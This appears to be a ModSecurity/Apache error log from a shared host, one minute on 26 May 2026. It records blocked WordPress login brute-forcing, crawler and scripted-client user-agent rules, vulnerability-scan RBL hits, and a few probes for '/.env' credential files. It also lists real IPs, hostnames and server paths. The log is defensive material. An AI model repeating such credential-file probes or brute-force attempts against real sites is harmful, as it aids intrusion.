[Tue May 26 20:04:19.985229 2026] [security2:error] [pid 106517:tid 106559] [remote 67.23.237.2:47206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.237.23.67.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWva4ZZc2DoU1lPnP2F5AAAxic"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 20:04:20.011858 2026] [security2:error] [pid 113091:tid 113215] [remote 74.207.252.187:40824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.252.207.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWva6PxBGSmlFNOy6pNowACUXs"]
[Tue May 26 20:04:21.381943 2026] [security2:error] [pid 113091:tid 113330] [client 114.119.150.166:35471] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahWvbaPxBGSmlFNOy6pNygAAAoE"], referer: http://glorodavionics.com/index.php?route=product/product&manufacturer_id=11&product_id=133&page=1
[Tue May 26 20:04:22.262682 2026] [security2:error] [pid 106517:tid 106730] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvbYZZc2DoU1lPnP2GDQAAANQ"]
[Tue May 26 20:04:23.061538 2026] [security2:error] [pid 113091:tid 113122] [remote 74.207.252.187:40824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.252.207.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvb6PxBGSmlFNOy6pN5gACaB4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:04:24.271339 2026] [security2:error] [pid 113091:tid 113336] [client 85.11.167.19:45972] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "stvica.com"] [uri "/.env"] [unique_id "ahWvcKPxBGSmlFNOy6pOFAAAAoc"]
[Tue May 26 20:04:24.284145 2026] [security2:error] [pid 113091:tid 113303] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvb6PxBGSmlFNOy6pOAgAAAmY"]
[Tue May 26 20:04:24.469541 2026] [security2:error] [pid 113091:tid 113274] [client 45.84.107.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvcKPxBGSmlFNOy6pOFQACSSE"], referer: https://kingsclub.in/privacy-policy
[Tue May 26 20:04:25.120822 2026] [security2:error] [pid 113091:tid 113304] [client 85.11.167.19:45982] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "stvica.com"] [uri "/"] [unique_id "ahWvcaPxBGSmlFNOy6pOMAAAAmc"]
[Tue May 26 20:04:26.122656 2026] [security2:error] [pid 112029:tid 112223] [client 85.11.167.19:45990] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "stvica.jhonweb.com"] [uri "/.env"] [unique_id "ahWvcqFW0C-ajaCsyFdFKQAAAUo"]
[Tue May 26 20:04:26.596963 2026] [security2:error] [pid 113091:tid 113235] [client 85.11.167.19:45998] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "stvica.jhonweb.com"] [uri "/"] [unique_id "ahWvcqPxBGSmlFNOy6pOVgAAAiI"]
[Tue May 26 20:04:27.404866 2026] [security2:error] [pid 113091:tid 113283] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvcqPxBGSmlFNOy6pObAAAAlI"]
[Tue May 26 20:04:28.511464 2026] [security2:error] [pid 112029:tid 112172] [client 69.63.184.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWvdKFW0C-ajaCsyFdFSQAAARc"]
[Tue May 26 20:04:29.240715 2026] [security2:error] [pid 112029:tid 112261] [client 212.38.189.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvdaFW0C-ajaCsyFdFXAABcAw"], referer: https://kingsclub.in/refund-policy
[Tue May 26 20:04:29.368697 2026] [security2:error] [pid 112029:tid 112048] [remote 173.249.15.100:41310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.15.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWvdaFW0C-ajaCsyFdFYwABEhI"]
[Tue May 26 20:04:29.920220 2026] [security2:error] [pid 112029:tid 112276] [client 69.63.184.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWvdaFW0C-ajaCsyFdFegAAAX8"]
[Tue May 26 20:04:29.969638 2026] [security2:error] [pid 112029:tid 112236] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvdaFW0C-ajaCsyFdFdQAAAVc"]
[Tue May 26 20:04:31.231526 2026] [security2:error] [pid 113091:tid 113177] [remote 51.91.98.45:36698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWvd6PxBGSmlFNOy6pO4QACHlU"]
[Tue May 26 20:04:32.015086 2026] [security2:error] [pid 113091:tid 113189] [remote 216.73.216.30:57174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/crm/password/reset"] [unique_id "ahWveKPxBGSmlFNOy6pPAwAChWE"]
[Tue May 26 20:04:32.870831 2026] [security2:error] [pid 113091:tid 113320] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWveKPxBGSmlFNOy6pPEQAAAnc"]
[Tue May 26 20:04:33.470247 2026] [security2:error] [pid 113091:tid 113297] [client 66.249.64.170:65506] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWveKPxBGSmlFNOy6pPCwAAAmA"], referer: https://doyecpa.com/prizes/23934187%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 20:04:34.613285 2026] [security2:error] [pid 112029:tid 112211] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWveqFW0C-ajaCsyFdFzAAAAT4"]
[Tue May 26 20:04:34.967338 2026] [security2:error] [pid 112029:tid 112256] [client 110.249.201.134:19744] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "blog.jhonweb.com"] [uri "/robots.txt"] [unique_id "ahWveqFW0C-ajaCsyFdF4wAAAWs"]
[Tue May 26 20:04:37.178028 2026] [security2:error] [pid 112029:tid 112190] [client 91.241.154.190:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvfKFW0C-ajaCsyFdF-QAAASk"]
[Tue May 26 20:04:37.636861 2026] [security2:error] [pid 112029:tid 112179] [client 192.42.116.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvfaFW0C-ajaCsyFdGFQABHis"], referer: https://kingsclub.in/restaurant
[Tue May 26 20:04:37.679739 2026] [security2:error] [pid 112029:tid 112237] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvfaFW0C-ajaCsyFdGDAAAAVg"]
[Tue May 26 20:04:38.321324 2026] [security2:error] [pid 113091:tid 113301] [client 68.183.88.172:38868] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rohiniventures.com"] [uri "/"] [unique_id "ahWvfqPxBGSmlFNOy6pPzAAAAmQ"]
[Tue May 26 20:04:38.411126 2026] [security2:error] [pid 113091:tid 113304] [client 114.119.137.141:25729] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.bloggertarget.com"] [uri "/tools-for-website/spinbot/"] [unique_id "ahWvfqPxBGSmlFNOy6pP0AAAAmc"], referer: https://www.bloggertarget.com/tools-for-website/spinbot/
[Tue May 26 20:04:40.185467 2026] [security2:error] [pid 112029:tid 112212] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvf6FW0C-ajaCsyFdGSQAAAT8"]
[Tue May 26 20:04:40.706601 2026] [security2:error] [pid 112029:tid 112184] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvgKFW0C-ajaCsyFdGcwAAASM"]
[Tue May 26 20:04:40.707035 2026] [security2:error] [pid 113091:tid 113253] [client 66.249.64.109:63068] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvgKPxBGSmlFNOy6pQDQAAAjQ"]
[Tue May 26 20:04:40.861816 2026] [security2:error] [pid 113091:tid 113312] [client 192.42.116.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvgKPxBGSmlFNOy6pQEwACbxs"], referer: https://kingsclub.in/rooms
[Tue May 26 20:04:40.926710 2026] [security2:error] [pid 113091:tid 113235] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvgKPxBGSmlFNOy6pQHQAAAiI"]
[Tue May 26 20:04:40.927119 2026] [security2:error] [pid 113091:tid 113313] [client 66.249.64.109:63068] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvgKPxBGSmlFNOy6pQGwAAAnA"]
[Tue May 26 20:04:42.746465 2026] [security2:error] [pid 112029:tid 112230] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvgqFW0C-ajaCsyFdGqgAAAVE"]
[Tue May 26 20:04:43.649388 2026] [security2:error] [pid 113091:tid 113229] [client 192.42.116.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvg6PxBGSmlFNOy6pQfwACHEM"], referer: https://kingsclub.in/skylounge
[Tue May 26 20:04:45.064850 2026] [autoindex:error] [pid 112029:tid 112284] [client 49.36.127.153:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.ucdc.co.in/
[Tue May 26 20:04:45.397497 2026] [security2:error] [pid 113091:tid 113258] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvhKPxBGSmlFNOy6pQsgAAAjk"]
[Tue May 26 20:04:46.116409 2026] [fcgid:warn] [pid 112029:tid 112280] (70014)End of file found: [client 66.132.195.45:41592] mod_fcgid: can't get data from http client
[Tue May 26 20:04:46.259863 2026] [security2:error] [pid 113091:tid 113240] [client 49.36.127.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWvhqPxBGSmlFNOy6pQ2AAAAic"], referer: http://www.ucdc.co.in/
[Tue May 26 20:04:47.230406 2026] [security2:error] [pid 112029:tid 112274] [client 192.42.116.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvh6FW0C-ajaCsyFdHIAABfWI"], referer: https://kingsclub.in/sports
[Tue May 26 20:04:47.707283 2026] [fcgid:warn] [pid 113091:tid 113321] (70014)End of file found: [client 66.132.195.53:60138] mod_fcgid: can't get data from http client
[Tue May 26 20:04:47.771422 2026] [security2:error] [pid 113091:tid 113336] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvh6PxBGSmlFNOy6pRBwAAAoc"]
[Tue May 26 20:04:49.165415 2026] [autoindex:error] [pid 113091:tid 113271] [client 66.132.195.53:60142] AH01276: Cannot serve directory /home2/svijakqj/masonicarkfoundation.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 20:04:50.318379 2026] [security2:error] [pid 113091:tid 113341] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWviaPxBGSmlFNOy6pRZAAAAow"]
[Tue May 26 20:04:50.492475 2026] [security2:error] [pid 113091:tid 113236] [client 193.200.229.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWviqPxBGSmlFNOy6pRcgACIxQ"], referer: https://kingsclub.in/summer-camp
[Tue May 26 20:04:52.224582 2026] [security2:error] [pid 113091:tid 113324] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvi6PxBGSmlFNOy6pRswAAAns"]
[Tue May 26 20:04:52.764368 2026] [security2:error] [pid 113091:tid 113130] [remote 213.171.208.232:51372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWvjKPxBGSmlFNOy6pR0gACYCY"]
[Tue May 26 20:04:54.480846 2026] [security2:error] [pid 113091:tid 113137] [remote 195.54.179.151:49652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 151.179.54.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvjqPxBGSmlFNOy6pSHwACky0"]
[Tue May 26 20:04:54.782234 2026] [security2:error] [pid 113091:tid 113132] [remote 195.54.179.151:49652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 151.179.54.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvjqPxBGSmlFNOy6pSMwACWSg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:04:56.107282 2026] [security2:error] [pid 113091:tid 113322] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvj6PxBGSmlFNOy6pSVwAAAnk"]
[Tue May 26 20:04:56.264865 2026] [security2:error] [pid 113091:tid 113153] [remote 216.73.216.30:60493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWvkKPxBGSmlFNOy6pScwACkT0"]
[Tue May 26 20:04:56.284033 2026] [security2:error] [pid 113091:tid 113222] [client 193.200.229.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvkKPxBGSmlFNOy6pSbwACFUQ"], referer: https://kingsclub.in/table-tennis
[Tue May 26 20:04:56.780823 2026] [security2:error] [pid 113091:tid 113191] [remote 213.171.208.232:51372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWvkKPxBGSmlFNOy6pSgQACjGM"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 20:04:57.388060 2026] [security2:error] [pid 113091:tid 113267] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvkKPxBGSmlFNOy6pSjAAAAkI"]
[Tue May 26 20:04:59.902022 2026] [security2:error] [pid 112029:tid 112035] [remote 160.250.186.220:45040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWvk6FW0C-ajaCsyFdH3gABXAU"]
[Tue May 26 20:05:00.715192 2026] [security2:error] [pid 113091:tid 113317] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvlKPxBGSmlFNOy6pS7wAAAnQ"]
[Tue May 26 20:05:01.779877 2026] [security2:error] [pid 113091:tid 113279] [client 123.26.207.135:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvlaPxBGSmlFNOy6pTGgAAAk4"]
[Tue May 26 20:05:02.630979 2026] [security2:error] [pid 113091:tid 113269] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvlqPxBGSmlFNOy6pTPwAAAkQ"]
[Tue May 26 20:05:05.523482 2026] [security2:error] [pid 113091:tid 113277] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvmaPxBGSmlFNOy6pTugAAAkw"]
[Tue May 26 20:05:08.088844 2026] [security2:error] [pid 113091:tid 113277] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvm6PxBGSmlFNOy6pUDgAAAkw"]
[Tue May 26 20:05:09.243819 2026] [security2:error] [pid 113091:tid 113261] [client 45.131.193.15:61991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.193.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freedomwealthchoose.com"] [uri "/wp-login.php"] [unique_id "ahWvnaPxBGSmlFNOy6pURAAAAjw"]
[Tue May 26 20:05:09.331807 2026] [security2:error] [pid 112029:tid 112076] [remote 192.42.116.20:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.116.42.192.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahWvnaFW0C-ajaCsyFdIfwABQy4"], referer: https://kingsclub.in/xmlrpc.php?rsd
[Tue May 26 20:05:10.627749 2026] [core:error] [pid 113091:tid 113226] [client 205.210.31.162:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 20:05:10.627770 2026] [core:error] [pid 113091:tid 113226] [client 205.210.31.162:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 20:05:10.922510 2026] [security2:error] [pid 112029:tid 112241] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvnqFW0C-ajaCsyFdImAAAAVw"]
